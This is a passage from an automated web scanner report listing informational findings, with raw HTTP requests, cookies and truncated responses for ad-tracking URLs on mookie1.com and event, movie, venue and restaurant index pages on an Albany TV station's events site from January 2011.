Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:10:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.81. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1636403816@x23

Request

GET /2/B3DM/2010DM/1636403816@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:14:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.82. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1670623313@x23

Request

GET /2/B3DM/2010DM/1670623313@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:19:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.83. http://dm.de.mookie1.com/2/B3DM/2010DM/1682100952@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1682100952@x23

Request

GET /2/B3DM/2010DM/1682100952@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270606

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.84. http://dm.de.mookie1.com/2/B3DM/2010DM/1838084819@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1838084819@x23

Request

GET /2/B3DM/2010DM/1838084819@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296269250

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:59:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.85. http://dm.de.mookie1.com/2/B3DM/2010DM/1845536281@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1845536281@x23

Request

GET /2/B3DM/2010DM/1845536281@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270656

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:16:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.86. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1874556783@x23

Request

GET /2/B3DM/2010DM/1874556783@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2453
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.87. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1902448725@x23

Request

GET /2/B3DM/2010DM/1902448725@x23?USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2458
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

27.88. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11678985058@x95

Request

GET /2/B3DM/DLX/11678985058@x95 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660; OAX=rcHW800iZiMAAocf; dlx_20100929=set;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:45:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2520
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var dlx_segment_li
...[SNIP]...

27.89. http://dm.de.mookie1.com/2/B3DM/DLX/@x94

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Request

GET /2/B3DM/DLX/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224089

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:14:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 666
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}

var oas_d=new Dat
...[SNIP]...

27.90. http://events.cbs6albany.com/site_indexes/allcurrenteventslist150m0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /site_indexes/allcurrenteventslist150m0.html

Request

GET /site_indexes/allcurrenteventslist150m0.html HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:05 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Sun, 30 Jan 2011 05:28:05 GMT
Cache-Control: max-age=86400
Content-Length: 151869

<html>
<head><title>Events & Activities Calendar near Albany,NY</title><META NAME="ROBOTS" CONTENT="NOINDEX,FOLLOW"></head>
<body>
<a href='/norfolk-ct/events/show/86926918-star-membership'>Star Membe
...[SNIP]...

27.91. http://events.cbs6albany.com/site_indexes/allcurrentmovieslist150m0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /site_indexes/allcurrentmovieslist150m0.html

Request

GET /site_indexes/allcurrentmovieslist150m0.html HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:03 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Sun, 30 Jan 2011 05:28:03 GMT
Cache-Control: max-age=86400
Content-Length: 5040

<html>
<head><title>Movies showing near Albany,NY</title><META NAME="ROBOTS" CONTENT="NOINDEX,FOLLOW"></head>
<body>
<a href='/movies/show/261885-127-hours'>127 Hours Drama Movie</a><br/>
<a href='/m
...[SNIP]...

27.92. http://events.cbs6albany.com/site_indexes/allvenueslist150m0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /site_indexes/allvenueslist150m0.html

Request

GET /site_indexes/allvenueslist150m0.html HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:05 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Sun, 30 Jan 2011 05:28:05 GMT
Cache-Control: max-age=86400
Content-Length: 427519

<html>
<head><title>Events & Activities Venues near Albany,NY</title><META NAME="ROBOTS" CONTENT="NOINDEX,FOLLOW"></head>
<body>
<a href='/troy-ny/venues/show/4336145-st-augustines-winter-snowball'>St
...[SNIP]...

27.93. http://events.cbs6albany.com/site_indexes/restaurantlist150m0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /site_indexes/restaurantlist150m0.html

Request

GET /site_indexes/restaurantlist150m0.html HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:05 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Sun, 30 Jan 2011 05:28:05 GMT
Cache-Control: max-age=86400
Content-Length: 249630

<html>
<head><title>Restaurants near Albany,NY</title><META NAME="ROBOTS" CONTENT="NOINDEX,FOLLOW"></head>
<body>
<a href='/albany-ny/venues/show/4338605-pf-changs-albany'>P.F. Chang's - Albany in Alb
...[SNIP]...

27.94. http://events.cbs6albany.com/site_indexes/theaterlist150m0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /site_indexes/theaterlist150m0.html

Request

GET /site_indexes/theaterlist150m0.html HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; 